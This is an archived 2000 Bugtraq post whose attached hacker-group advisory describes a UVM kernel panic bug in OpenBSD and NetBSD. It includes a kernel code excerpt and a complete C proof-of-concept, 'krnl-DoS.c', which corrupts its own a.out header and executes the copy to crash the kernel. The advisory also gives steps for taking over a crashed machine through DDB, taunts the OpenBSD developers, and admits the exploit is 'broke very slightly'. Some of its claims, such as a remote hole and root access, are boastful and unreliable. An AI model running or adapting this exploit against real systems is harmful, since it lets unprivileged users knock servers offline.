[17500] in bugtraq
OpenBSD Exploit
daemon@ATHENA.MIT.EDU (rloxley)
Mon Nov 6 00:58:12 2000
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0011_01C046D8.6B9019A0"
Message-Id: <001501c04702$54ee3d60$4063abd0@bob>
Date: Sun, 5 Nov 2000 03:28:09 -0500
Reply-To: rloxley <rloxley@HACKPHREAK.ORG>
From: rloxley <rloxley@HACKPHREAK.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_0011_01C046D8.6B9019A0
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_0012_01C046D8.6B9019A0"
------=_NextPart_001_0012_01C046D8.6B9019A0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
------=_NextPart_001_0012_01C046D8.6B9019A0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV> </DIV></BODY></HTML>
------=_NextPart_001_0012_01C046D8.6B9019A0--
------=_NextPart_000_0011_01C046D8.6B9019A0
Content-Type: application/octet-stream;
name="hp2.adv"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="hp2.adv"
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 =
advisory % -=0A=
| =
|=0A=
| www.hackphreak.org =
|=0A=
| =
|=0A=
| Version : Hackphreak advisory #2 of many =
|=0A=
| Author : RLoxley[hackphreak / condemnation / EHAP / RSH / ZSH =
(soon)]|=0A=
| Contributed : All of Team Hackphreak (thanks alot) & SSG =
|=0A=
| Topic : A non-privledged user may crash an OpenBSD Operating =
System,|=0A=
| thus rendering the system useless. =
|=0A=
| Effected : All Operating Systems which use UVM (not MACH VM) =
|=0A=
| * OpenBSD =
|=0A=
| * NetBSD =
|=0A=
| Prvt Release : November 5th, 1998 =
|=0A=
| Released : November 5th, 2000 =
|=0A=
| Credits : www.hackphreak.org, zsh.interniq.org, =
www.subterrain.net |=0A=
| Check Section 1 =
|=0A=
| Vender status : Notified =
|=0A=
| =
|=0A=
- HP2 advisory % HP2 advisory % HP2 advisory % HP2 advisory % HP2 =
advisory % -=0A=
=0A=
=0A=
Section 1 [Greets]:=0A=
=0A=
First and foremost, thanks to team hackphreak and SSG, great job!=0A=
SSG helped during the researching of the bug (bind, aempire, cripto).=0A=
This was a coordinated effort with Team Hackphreak and The Hacker=0A=
Collective known as SSG.=0A=
=0A=
I would like to thank RootShellHackers and Team ZSH for rigorously =
testing on many freenets :] (ratcorpse and her great mass testing=0A=
scripts, great for analysis: www.sneakerz.org/~rat < great site :)=0A=
=0A=
I would like to thank caddis of TESO. He started the whole OpenBSD=0A=
war. Keep up the good work.=0A=
=0A=
Special thanks to Mixter and his TFN2k. It has made my job much=0A=
easier.=0A=
=0A=
I would also like to thank: EHAP, Condemnation, gov-boi (hack.co.za),=0A=
shinex (yf0rce :), ISS, Solar Designer, #hackphreak, #darknet, =0A=
#!/bin/zsh, #condemnation, #conf, Al Hugher, Aleph1, and my parents.=0A=
=0A=
=0A=
Section 2 [Preface]:=0A=
=0A=
Usually Team HackPhreak keeps our code and research quite private=0A=
until we give lectures in our channel on undernet (#hackphreak). But what=0A=
really annoys us, is when a very big figure in the security community =
acts=0A=
disrespectful to the people who help build this internet infastructure. =
This=0A=
person who I speak of, is Theo de Raadt. Theo de Raadt claims that =
OpenBSD =0A=
hasn't experienced a local root hole in the default install for many =
years.=0A=
During his internal security audits, they find many bugs, yet they just =0A=
hide them, patch them, and never notify the public. This is very =
unethical=0A=
on the part of the OpenBSD team. I think you guys are lame. What worrys=0A=
Team Hackphreak, is how many other bugs have gone unnoticed. We have =
found=0A=
many other exlpoitable holes in previous OpenBSD distributions, that =
have =0A=
miraculously been patched and never revealed. Next, there is the "Three =0A=
years without a remote hole in the default install". I hope this advisory=0A=
breaks that aswell, because, technically:=0A=
=0A=
* Log into the remote host=0A=
* Grab our exploit=0A=
* Crash the kernel=0A=
=0A=
This bug is also be exploitable via NFS.=0A=
=0A=
Three years without a remote hole? Strike that.=0A=
=0A=
=0A=
Section 3 [Background]:=0A=
=0A=
UVM is a new virtual memory system developed which is currently=0A=
used in the OpenBSD Operating Systems. It is significantly better than =
the=0A=
traditional MACH based VM.=0A=
=0A=
=0A=
Section 4 [Problem Description]:=0A=
=0A=
There exists a bug in the UVM code which has blatently slipped passed=0A=
the seemlessly small minded OpenBSD security auditors. The bug exists in =
the=0A=
anonymous mapping code in UVM. This bug allows for any local user (or =
remote=0A=
user) to crash the entire OpenBSD system, rendering it completely =
useless. =0A=
Once the system has crashed, a local user (with access to the terminal) =
may=0A=
in fact hack the system. The system drops into DDB (man it). DDB allows =
for=0A=
debugging of the actual kernel. When one has access to the kernel, they =
can=0A=
do most anything: such as reading disk buffers, reading _copyright, =
reading=0A=
network mbuf's. So this scales to a most incredible attack, not just a =
DoS=0A=
(if you have read through this you have now more reason to switch to =
Linux).=0A=
=0A=
A very smart attacker will:=0A=
=0A=
* Crash the kernel=0A=
* Assume the location of the box which crashed (@ the colo)=0A=
* Use DDB to gain god status=0A=
=0A=
A layout of the crash dump is given:=0A=
=0A=
* trap()=0A=
* uvm_fault()=0A=
* uvmfault_amapcopy()=0A=
* amap_copy()=0A=
* amap_alloc()=0A=
=0A=
------------------------------------------------------------------=0A=
struct vm_amap *=0A=
amap_alloc(sz, padsz, waitf)=0A=
vaddr_t sz, padsz;=0A=
int waitf;=0A=
=0A=
/*=0A=
* amap_alloc: allocate an amap to manage "sz" bytes of anonymous VM=0A=
*=0A=
* =3D> caller should ensure sz is a multiple of PAGE_SIZE=0A=
* =3D> reference count to new amap is set to one=0A=
* =3D> new amap is returned unlocked=0A=
*/=0A=
=0A=
{=0A=
struct vm_amap *amap;=0A=
int slots, padslots;=0A=
UVMHIST_FUNC("amap_alloc"); UVMHIST_CALLED(maphist);=0A=
=0A=
AMAP_B2SLOT(slots, sz); /* load slots */=0A=
AMAP_B2SLOT(padslots, padsz);=0A=
------------------------------------------------------------------=0A=
=0A=
The kernel crashes in the first instance of AMAP_B2SLOT(slots, sz).=0A=
=0A=
------------------------------------------------------------------=0A=
#define AMAP_B2SLOT(S,B) { \=0A=
if ((B) & (PAGE_SIZE - 1)) \=0A=
panic("AMAP_B2SLOT: invalid byte count"); \=0A=
(S) =3D (B) >> PAGE_SHIFT; \=0A=
}=0A=
------------------------------------------------------------------=0A=
=0A=
Basically, if the (sz & (PAGE_SIZE-1)) is true, the kernel =0A=
panic()'s. Not so cool Mr. Theo, my grandmother wouldn't even have =0A=
done something so stupid and all she has is an A+ and CCNA!=0A=
=0A=
As aempirei, bind, and cripto pointed out: Even if AMAP_B2SLOT()=0A=
is patched, the bug will still exist, hence forth because later=0A=
on down the yellow brick road, the kernel will crash in routines such as:=0A=
=0A=
* amap_splitref()=0A=
* amap_lookup()=0A=
=0A=
So a hacker will still be able to obtain root access. No thanks=0A=
to obecian for notifying Theo a wee bit early.=0A=
=0A=
=0A=
Section 4 [The exploit]:=0A=
=0A=
// PUBLIC RELEASE=0A=
//=0A=
// krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG=0A=
//=0A=
// This exploit is proof of concept code. It exploits the UVM bug in=0A=
// all OpenBSD kernels. It can also be used to gain god access via=0A=
// ddb during the crash recovery phase of OpenBSD's security structure.=0A=
//=0A=
// Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,=0A=
// Condemnation, caddis[TESO], Solar Designer, gov-boi,=0A=
// #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)=0A=
// SSG, www.subterrain.net=0A=
//=0A=
// PS: The exploit is broke very slightly, so this takes some knowledge =
;)=0A=
//=0A=
// PUBLIC RELEASE=0A=
=0A=
=0A=
#include <stdio.h>=0A=
#include <errno.h>=0A=
#include <stdlib.h>=0A=
#include <string.h>=0A=
#include <unistd.h>=0A=
#include <a.out.h>=0A=
#include <fcntl.h>=0A=
#include <sys/types.h>=0A=
=0A=
#define CRASH_FILE "./f0rKb0mB"=0A=
=0A=
extern int errno;=0A=
=0A=
int=0A=
main(int argc, char *argv[])=0A=
{=0A=
struct exec *ehdr;=0A=
struct stat statbuf;=0A=
int fd;=0A=
unsigned char *data;=0A=
=0A=
=0A=
fd =3D open(argv[0], O_RDONLY);=0A=
if (fd < 0)=0A=
{=0A=
perror("main() : open(argv[0]) ");=0A=
exit(-1);=0A=
}=0A=
=0A=
if (fstat(fd, &statbuf) < 0)=0A=
{=0A=
perror("main() : fstat() ");=0A=
exit(-1);=0A=
}=0A=
=0A=
data =3D (unsigned char *) malloc(statbuf.st_size);=0A=
if (data =3D=3D NULL)=0A=
{=0A=
perror("main() : malloc() ");=0A=
exit(-1);=0A=
}=0A=
=0A=
if (read(fd, data, statbuf.st_size) <=3D 0)=0A=
{=0A=
puts("main() : read() Failure");=0A=
exit(-1);=0A=
}=0A=
=0A=
ehdr =3D (struct exec *) data;=0A=
=0A=
close(fd);=0A=
=0A=
unlink(CRASH_FILE);=0A=
=0A=
fd =3D open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);=0A=
if (fd < 0)=0A=
{=0A=
perror("main() : open(CRASH_FILE) ");=0A=
exit(-1);=0A=
}=0A=
=0A=
ehdr->a_data +=3D 3;=0A=
=0A=
if (write(fd, data, statbuf.st_size) < 0)=0A=
{=0A=
perror("main() : write() ");=0A=
exit(-1);=0A=
}=0A=
=0A=
close(fd);=0A=
=0A=
if (execlp(CRASH_FILE, NULL) < 0)=0A=
{=0A=
perror("main() : execlp() ");=0A=
exit(-1);=0A=
}=0A=
=0A=
return (0);=0A=
}=0A=
=0A=
=0A=
Section 5 [TO HELL WITH YOU'S]:=0A=
=0A=
Theo de Raadt and the OpenBSD Team=0A=
=0A=
Paedophiles=0A=
=0A=
Rascists=0A=
=0A=
All of #kkk on undernet=0A=
=0A=
All of the people who disturb my channel=0A=
=0A=
BoW=0A=
=0A=
frys / prophet=0A=
=0A=
b0g=0A=
=0A=
Scriptkiddies all over the place=0A=
=0A=
obecian=0A=
=0A=
=0A=
Section 6 [Come 1 Come ALL]:=0A=
=0A=
Team Hackphreak invites you to undernet #hackphreak for a great=0A=
learning experience. Just join us to teach and learn. But remember,=0A=
HARASSMENT =3D BAN. www.hackphreak.org/newbie.=0A=
=0A=
=0A=
Section 7 [Lies]:=0A=
=0A=
I hope this advisory brings you closer to NT / Linux, rather than=0A=
OpenBSD. Linux & NT are way better anyway.=0A=
------=_NextPart_000_0011_01C046D8.6B9019A0--
